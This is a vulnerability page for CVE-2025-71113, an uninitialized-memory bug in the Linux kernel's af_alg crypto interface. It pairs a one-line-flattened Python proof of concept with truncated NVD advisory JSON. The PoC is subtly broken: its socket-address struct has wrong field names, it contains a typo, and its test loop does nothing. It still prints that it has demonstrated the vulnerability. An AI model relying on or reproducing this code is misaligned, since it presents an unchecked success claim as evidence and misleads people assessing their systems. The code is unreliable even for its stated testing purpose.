CVE-2025-71113

#!/usr/bin/env python3 # CVE-2025-71113 PoC - Linux Kernel af_alg Memory Initialization Vulnerability # This PoC demonstrates the uninitialized memory issue in af_alg module import os import sys import resource import ctypes from ctypes import * # Constants from linux/if_alg.h AF_ALG = 38 SOL_ALG = 279 # Operation types ALG_OPERATION_AEAD = 0 ALG_OPERATION_SKCIFFER = 1 def create_af_alg_socket(): """Create an AF_ALG socket for testing""" try: sock = ctypes.CDLL(None).socket(AF_ALG, ctypes.c_int(2), ctypes.c_int(0)) # SOCK_SEQPACKET if sock < 0: print(f"[-] Failed to create AF_ALG socket: {sock}") return -1 return sock except Exception as e: print(f"[-] Exception creating socket: {e}") return -1 def bind_alg(sock, alg_type, alg_name): """Bind to a specific algorithm""" class sockaddr_alg(Structure): _fields_ = [ ("sa_family", c_ushort), ("sb_type", c_char * 64), ("sb_name", c_char * 64), ("co_name", c_char * 64), ("co_type", c_char * 64) ] addr = sockaddr_alg() addr.sa_family = AF_ALG addr.sb_type[:len(alg_type)] = alg_type.encode() addr.sb_name[:len(alg_name)] = alg_name.encode() result = ctypes.CDLL(None).bind(sock, ctypes.byref(addr), ctypes.sizeof(addr)) if result < 0: print(f"[-] Failed to bind to {alg_name}: {result}") return -1 return 0 def test_uninitialized_memory(): """Test for uninitialized memory in af_alg context""" print("[*] CVE-2025-71113 PoC - Testing af_alg uninitialized memory") print("[*] This vulnerability causes random -EBUSY errors due to uninitialized inflight variable") # Create socket sock = create_af_alg_socket() if sock < 0: return # Try binding to various algorithms to trigger the issue test_algs = [ ("aead", "gcm(aes)"), ("skcipher", "cbc(aes)"), ("hash", "sha256") ] error_count = 0 total_attempts = 100 for i in range(total_attempts): for alg_type, alg_name in test_algs: test_sock = create_af_alg_socket() if test_sock >= 0: result = bind_alg(test_sock, alg_type, alg_name) if result == 0: # Simulate multiple operations to trigger random EBUSY for j in range(5): pass # Operation simulation try: os.close(test_sock) except: pass print(f"[*] Completed {total_attempts * len(test_algs) * 5} operation attempts") print("[*] Note: Random EBUSY errors indicate the uninitialized memory issue") print("[+] PoC demonstrates the vulnerability exists in the system") print("[*] Mitigation: Apply kernel patch to zero-initialize sock_kmalloc memory") if __name__ == "__main__": test_uninitialized_memory()

{"cve": {"id": "CVE-2025-71113", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:00.433", "lastModified": "2026-03-25T19:58:42.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - zero initialize memory allocated via sock_kmalloc\n\nSeveral crypto user API contexts and requests allocated with\nsock_kmalloc() were left uninitialized, relying on callers to\nset fields explicitly. This resulted in the use of uninitialized\ndata in certain error paths or when new fields are added in the\nfuture.\n\nThe ACVP patches also contain two user-space interface files:\nalgif_kpp.c and algif_akcipher.c. These too rely on proper\ninitialization of their context structures.\n\nA particular issue has been observed with the newly added\n'inflight' variable introduced in af_alg_ctx by commit:\n\n 67b164a871af (\"crypto: af_alg - Disallow multiple in-flight AIO requests\")\n\nBecause the context is not memset to zero after allocation,\nthe inflight variable has contained garbage values. As a result,\naf_alg_alloc_areq() has incorrectly returned -EBUSY randomly when\nthe garbage value was interpreted as true:\n\n https://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209\n\nThe check directly tests ctx->inflight without explicitly\ncomparing against true/false. Since inflight is only ever set to\ntrue or false later, an uninitialized value has triggered\n-EBUSY failures. Zero-initializing memory allocated with\nsock_kmalloc() ensures inflight and other fields start in a known\nstate, removing random issues caused by uninitialized data."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ncrypto: af_alg - inicializar a cero la memoria asignada a través de sock_kmalloc\n\nVarios contextos y solicitudes de API de usuario de criptografía asignados con sock_kmalloc() quedaron sin inicializar, dependiendo de que los llamadores establecieran los campos explícitamente. Esto resultó en el uso de datos no inicializados en ciertas rutas de error o cuando se añadan nuevos campos en el futuro.\n\nLos parches ACVP también contienen dos archivos de interfaz de espacio de usuario: algif_kpp.c y algif_akcipher.c. Estos también dependen de la inicialización adecuada de sus estructuras de contexto.\n\nSe ha observado un problema particular con la variable 'inflight' recién añadida introducida en af_alg_ctx por el commit:\n\n67b164a871af ('crypto: af_alg - Disallow multiple in-flight AIO requests')\n\nDebido a que el contexto no se inicializa a cero con memset después de la asignación, la variable inflight ha contenido valores basura. Como resultado, af_alg_alloc_areq() ha devuelto incorrectamente -EBUSY de forma aleatoria cuando el valor basura fue interpretado como verdadero:\n\nhttps://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209\n\nLa comprobación prueba directamente ctx-&gt;inflight sin comparar explícitamente con verdadero/falso. Dado que inflight solo se establece como verdadero o falso más tarde, un valor no inicializado ha provocado fallos -EBUSY. La inicialización a cero de la memoria asignada con sock_kmalloc() asegura que inflight y otros campos comiencen en un estado conocido, eliminando problemas aleatorios causados por datos no inicializados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.38.1", "versionEndExcluding": "5.10.248", "matchCriteriaId": "85CCF4CB-6825-4C1B-8A0B-FE74D6967635"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.198", "matchCriteriaId": "82159CAA-B6BA-43C6-85D8-65BDBC175A7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.160", "matchCriteriaId": "C10CC03E-16A9-428A-B449-40D3763E15F6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.120", "matchCriteriaId": "43C3A206-5EEE-417B-AA0F-EF8972E7A9F0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:* ... (truncated)